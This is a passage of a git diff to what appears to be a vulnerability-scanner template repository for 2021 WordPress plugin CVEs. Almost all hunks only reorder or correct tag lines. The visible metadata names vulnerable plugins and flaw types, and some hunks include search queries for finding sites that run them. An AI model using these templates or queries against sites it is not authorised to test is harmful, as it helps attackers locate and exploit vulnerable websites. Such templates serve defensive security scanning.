b/http/cves/2021/CVE-2021-24145.yaml index a66a27dc6b..7dc02e05b6 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -28,7 +28,7 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive,webnus + tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus http: - raw: diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index 2f5276728f..b3e399e622 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -26,7 +26,7 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: cve2021,wpscan,packetstorm,wordpress,wp-plugin,cve,webnus + tags: cve,cve2021,wpscan,packetstorm,wordpress,wp-plugin,webnus http: - method: GET diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index de95a74c8f..3e257a388c 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -28,7 +28,7 @@ info: vendor: likebtn-like-button_project product: likebtn-like-button framework: wordpress - tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project + tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project http: - raw: diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index 9c63190fdc..dd634e0922 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -28,7 +28,7 @@ info: vendor: backup-guard product: backup_guard framework: wordpress - tags: authenticated,wp,packetstorm,wp-plugin,cve2021,rce,wordpress,cve,backup,wpscan,intrusive,backup-guard + tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard http: - raw: diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index 83dabbfe1c..7823bc05a7 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -27,7 +27,7 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress - tags: cve,cve2021,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms + tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms http: - raw: diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index c7900f5fcb..872a699cc8 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -28,7 +28,7 @@ info: vendor: algolplus product: advanced_order_export framework: wordpress - tags: wordpress,authenticated,wpscan,cve,cve2021,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus + tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus http: - raw: diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index e7d59657a6..42608403d4 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -27,7 +27,7 @@ info: vendor: jh_404_logger_project product: jh_404_logger framework: wordpress - tags: cve,cve2021,wordpress,wp-plugin,xss,wpscan,jh_404_logger_project + tags: cve2021,cve,wordpress,wp-plugin,xss,wpscan,jh_404_logger_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index 3e9fa55202..a649d4d98c 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -27,7 +27,7 @@ info: vendor: kiboit product: phastpress framework: wordpress - tags: cve2021,redirect,wpscan,wordpress,cve,kiboit + tags: cve2021,cve,redirect,wpscan,wordpress,kiboit http: - method: GET diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 98bc98fe23..45768987f7 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -27,7 +27,7 @@ info: vendor: daggerhartlab product: openid_connect_generic_client framework: wordpress - tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,wp,openid,daggerhartlab + tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab http: - method: GET diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index ff34e970d1..435e692908 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -28,7 +28,7 @@ info: product: controlled_admin_access framework: wordpress publicwww-query: /wp-content/plugins/controlled-admin-access/ - tags: cve,cve2021,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby + tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby http: - raw: diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index 0ca21195d5..0a8caef113 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -25,7 +25,7 @@ info: vendor: accessally product: accessally framework: wordpress - tags: wordpress,cve,cve2021,wp-plugin,wpscan,accessally + tags: cve2021,cve,wordpress,wp-plugin,wpscan,accessally http: - method: GET diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 6b5a83d97e..fb12e8a23a 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -27,7 +27,7 @@ info: vendor: patreon product: patreon_wordpress framework: wordpress - tags: wordpress,patreon-connect,unauth,cve2021,lfi,patreon,wp,wpscan,cve + tags: cve,cve2021,wordpress,patreon-connect,unauth,lfi,patreon,wp,wpscan http: - method: GET diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 5173993f91..5f338b8d06 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -27,7 +27,7 @@ info: vendor: boostifythemes product: goto framework: wordpress - tags: xss,wp-theme,wpscan,cve,cve2021,wordpress,boostifythemes + tags: cve2021,cve,xss,wp-theme,wpscan,wordpress,boostifythemes http: - method: GET diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index d870649232..fc5e708645 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -28,7 +28,7 @@ info: vendor: imagements_project product: imagements framework: wordpress - tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive,imagements_project + tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project variables: php: "{{to_lower('{{randstr}}')}}.php" post: "1" diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index 1db715adbd..a37d3cabfa 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -28,7 +28,7 @@ info: vendor: purethemes product: findeo framework: wordpress - tags: cve,cve2021,realteo,xss,wordpress,plugin,wpscan,intrusive,purethemes + tags: cve2021,cve,realteo,xss,wordpress,plugin,wpscan,intrusive,purethemes http: - method: GET diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 0b6b60d600..1667c75cbd 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -27,7 +27,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve,cve2021,xss,pie-register,wp,wpscan,genetechsolutions,wordpress + tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress http: - method: GET diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index a0cfb96b93..985db96377 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -27,7 +27,7 @@ info: vendor: trumani product: stop_spammers framework: wordpress - tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,packetstorm,trumani + tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani http: - raw: diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index 222318b24d..8b5ebbd63e 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -26,7 +26,7 @@ info: vendor: supsystic product: ultimate_maps framework: wordpress - tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin,maps,supsystic + tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic http: - method: GET diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index 71c5903c12..6cdf8503fe 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -26,7 +26,7 @@ info: vendor: supsystic product: popup framework: wordpress - tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin,supsystic + tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic http: - method: GET diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 2b63b0e3cb..59ad10e65f 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -26,7 +26,7 @@ info: vendor: supsystic product: contact_form framework: wordpress - tags: wordpress,cve,cve2021,wp-plugin,wpscan,packetstorm,supsystic + tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic http: - method: GET diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index a9b9797f0e..164d703920 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -26,7 +26,7 @@ info: vendor: querysol product: redirection_for_contact_form_7 framework: wordpress - tags: wordpress,wp-plugin,wpscan,cve,cve2021,querysol + tags: cve2021,cve,wordpress,wp-plugin,wpscan,querysol http: - method: POST diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index f869a9c83e..938bf1969d 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -30,7 +30,7 @@ info: vendor: kaswara_project product: kaswara framework: wordpress - tags: intrusive,unauth,fileupload,wpscan,cve,wordpress,wp-plugin,rce,cve2021,wp,kaswara_project + tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project variables: zip_file: "{{to_lower(rand_text_alpha(6))}}" php_file: "{{to_lower(rand_text_alpha(2))}}.php" diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index 68bd1eb3d1..0e394f8436 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -26,7 +26,7 @@ info: vendor: cars-seller-auto-classifieds-script_project product: cars-seller-auto-classifieds-script framework: wordpress - tags: cve2021,wordpress,wp-plugin,sqli,wpscan,cve,cars-seller-auto-classifieds-script_project + tags: cve2021,cve,wordpress,wp-plugin,sqli,wpscan,cars-seller-auto-classifieds-script_project http: - raw: diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index e1a5ab347f..d1a55505eb 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -26,7 +26,7 @@ info: vendor: mooveagency product: redirect_404_to_parent framework: wordpress - tags: xss,cve,cve2023,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency + tags: cve2021,cve,xss,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency http: - raw: diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 9f911f4459..623a70c613 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -28,7 +28,7 @@ info: vendor: mooveagency product: select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons framework: wordpress - tags: wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,cve2021,xss,wp-plugin,cve,wordpress,edb,mooveagency + tags: cve2021,cve,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,xss,wp-plugin,wordpress,edb,mooveagency http: - raw: diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index df6c9a38f9..c409c34be1 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -25,7 +25,7 @@ info: vendor: acymailing product: acymailing framework: wordpress - tags: wpscan,wordpress,cve,cve2021,redirect,wp-plugin,acymailing + tags: cve,cve2021,wpscan,wordpress,redirect,wp-plugin,acymailing http: - method: GET diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 13f83867b2..177391e269 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -27,7 +27,7 @@ info: vendor: 10web product: photo_gallery framework: wordpress - tags: photo,wpscan,packetstorm,cve,cve2021,xss,wordpress,wp-plugin,10web + tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web http: - method: GET diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index f9dc597841..330b05b7e1 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -27,7 +27,7 @@ info: vendor: ibenic product: simple_giveaways framework: wordpress - tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,ibenic + tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic http: - method: GET diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index 52b07314a1..b996140710 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -25,7 +25,7 @@ info: vendor: pickplugins product: product_slider_for_woocommerce framework: wordpress - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins + tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins http: - raw: diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 2f3c738033..6819369083 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -27,7 +27,7 @@ info: vendor: wowthemes product: mediumish framework: wordpress - tags: cve,cve2021,mediumish,xss,wordpress,wpscan,intrusive,wowthemes + tags: cve2021,cve,mediumish,xss,wordpress,wpscan,intrusive,wowthemes http: - method: GET diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 1d344c9c7b..4c49b4fab7 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -26,7 +26,7 @@ info: vendor: bold-themes product: bello framework: wordpress - tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve,bold-themes + tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes http: - method: GET diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index 62650cc0db..f85a538bc6 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -28,7 +28,7 @@ info: vendor: smartdatasoft product: car_repair_services_\&_auto_mechanic framework: wordpress - tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan,smartdatasoft + tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft http: - method: GET diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 61333601e9..dfcf1a776e 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -26,7 +26,7 @@ info: vendor: veronalabs product: wp_statistics framework: wordpress - tags: cve,wp-plugin,unauth,wpscan,cve2021,wordpress,sqli,blind,edb,veronalabs + tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs http: - raw: diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index b84d521090..748d4586cf 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -25,7 +25,7 @@ info: vendor: jnews product: jnews framework: wordpress - tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve,jnews + tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews http: - raw: diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index cc0745d5e9..73ba339ae6 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -28,7 +28,7 @@ info: vendor: smartypantsplugins product: sp_project_\&_document_manager framework: wordpress - tags: sp-client-document-manager,wpscan,cve,wp-plugin,wp,authenticated,wordpress,cve2021,rce,packetstorm,intrusive,smartypantsplugins + tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins http: - raw: diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index cd0466389e..93068cb6c4 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -27,7 +27,7 @@ info: vendor: posimyth product: the_plus_addons_for_elementor framework: wordpress - tags: cve2021,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,cve,posimyth + tags: cve2021,cve,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,posimyth http: - raw: diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index 6a486dc65d..df23eeefb6 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -26,7 +26,7 @@ info: vendor: posimyth product: the_plus_addons_for_elementor framework: wordpress - tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,elementor,posimyth + tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,elementor,posimyth http: - raw: diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 260c9d490d..ec50304c80 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -25,7 +25,7 @@ info: vendor: tielabs product: jannah framework: wordpress - tags: cve,cve2021,wordpress,xss,wp-theme,wpscan,tielabs + tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs http: - method: GET diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index 2d6c7ed9b1..20f67436e0 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -30,7 +30,7 @@ info: product: fancy_product_designer framework: wordpress google-query: inurl:“/wp-content/plugins/fancy-product-designer” - tags: wordpress,wp,seclists,cve,wpscan,cve2021,rce,wp-plugin,fancyproduct,radykal + tags: cve2021,cve,wordpress,wp,seclists,wpscan,rce,wp-plugin,fancyproduct,radykal http: - method: GET diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index dfa5b538f1..270509d392 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -25,7 +25,7 @@ info: vendor: chimpgroup product: foodbakery framework: wordpress - tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan,chimpgroup + tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,chimpgroup http: - method: GET diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index 4bade2d715..6d2bfe8558 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -25,7 +25,7 @@ info: vendor: gvectors product: wpforo_forum framework: wordpress - tags: wpscan,wordpress,redirect,cve,cve2021,gvectors + tags: cve2021,cve,wpscan,wordpress,redirect,gvectors http: - method: GET diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index a755f41ec5..76e63c4b16 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -25,7 +25,7 @@ info: vendor: tielabs product: jannah framework: wordpress - tags: cve,cve2021,wordpress,xss,wp-theme,wpscan,tielabs + tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs http: - raw: diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index a2a040a9ea..4ebebf1aca 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -27,7 +27,7 @@ info: product: prismatic framework: wordpress publicwww-query: "/wp-content/plugins/prismatic" - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet + tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet http: - raw: diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index 1e44c53b93..2df7980814 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -28,7 +28,7 @@ info: vendor: gambit product: titan_framework framework: wordpress - tags: wp,xss,wp-plugin,titan-framework,wpscan,cve,cve2021,wordpress,gambit + tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit http: - method: GET diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index bd0a199922..be83db2ea0 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -28,7 +28,7 @@ info: vendor: boldgrid product: w3_total_cache framework: wordpress - tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated,boldgrid + tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated,boldgrid http: - raw: diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index 0354ee535b..366d0df237 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -27,7 +27,7 @@ info: vendor: boldgrid product: w3_total_cache framework: wordpress - tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid + tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid http: - raw: diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index f2107d2801..ee8196ca42 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -28,7 +28,7 @@ info: product: kentharadio framework: wordpress publicwww-query: "/wp-content/plugins/qt-kentharadio" - tags: wordpress,lfi,ssrf,wp,wp-plugin,wpscan,cve,cve2021,qantumthemes + tags: cve2021,cve,wordpress,lfi,ssrf,wp,wp-plugin,wpscan,qantumthemes http: - method: GET diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 2cd5434fef..b8f6a95676 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -25,7 +25,7 @@ info: vendor: pickplugins product: post_grid framework: wordpress - tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin,pickplugins + tags: cve2021,cve,authenticated,wpscan,xss,wp,wordpress,wp-plugin,pickplugins http: - raw: diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index a4f48d5765..a6cd0bcb4d 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -27,7 +27,7 @@ info: vendor: marmoset product: marmoset_viewer framework: wordpress - tags: xss,wpscan,cve,cve2021,wp-plugin,wordpress,intrusive,marmoset + tags: cve2021,cve,xss,wpscan,wp-plugin,wordpress,intrusive,marmoset http: - method: GET diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 91205c5741..865f2cb720 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -25,7 +25,7 @@ info: vendor: dwbooster product: calendar_event_multi_view framework: wordpress - tags: cve,cve2021,xss,wordpress,wp-plugin,wpscan,dwbooster + tags: cve2021,cve,xss,wordpress,wp-plugin,wpscan,dwbooster http: - raw: diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index f0a88fe077..d4295d4304 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml @@ -28,7 +28,7 @@ info: vendor: amentotech product: workreap framework: wordpress - tags: wpscan,packetstorm,cve,cve2021,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech + tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech http: - raw: diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index ebfc155df4..436c2ee696 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: mf_gig_calendar_project product: mf_gig_calendar - tags: wp-plugin,authenticated,wpscan,wordpress,cve,cve2021,mf_gig_calendar_project + tags: cve2021,cve,wp-plugin,authenticated,wpscan,wordpress,mf_gig_calendar_project http: - raw: diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index a29b6f5e31..b43bc095fa 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -29,7 +29,7 @@ info: vendor: freelancetoindia product: paytm-pay framework: wordpress - tags: cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,cve,freelancetoindia + tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia http: - raw: diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index fba52183fc..a3e390c385 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -25,7 +25,7 @@ info: product: g_auto-hyperlink framework: wordpress publicwww-query: /wp-content/plugins/g-auto-hyperlink/ - tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project + tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project variables: num: 999999999 diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index 0f3ba9d6ce..90b6c83ffc 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -28,7 +28,7 @@ info: vendor: podlove product: podlove_podcast_publisher framework: wordpress - tags: cve2021,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,cve,podlove + tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove http: - method: GET diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 5b36c85689..0ea5706b9f 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -27,7 +27,7 @@ info: vendor: wp_visitor_statistics_\(real_time_traffic\)_project product: wp_visitor_statistics_\(real_time_traffic\) framework: wordpress - tags: authenticated,wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project + tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index 7b928da7d8..65d74d9e50 100644 --- 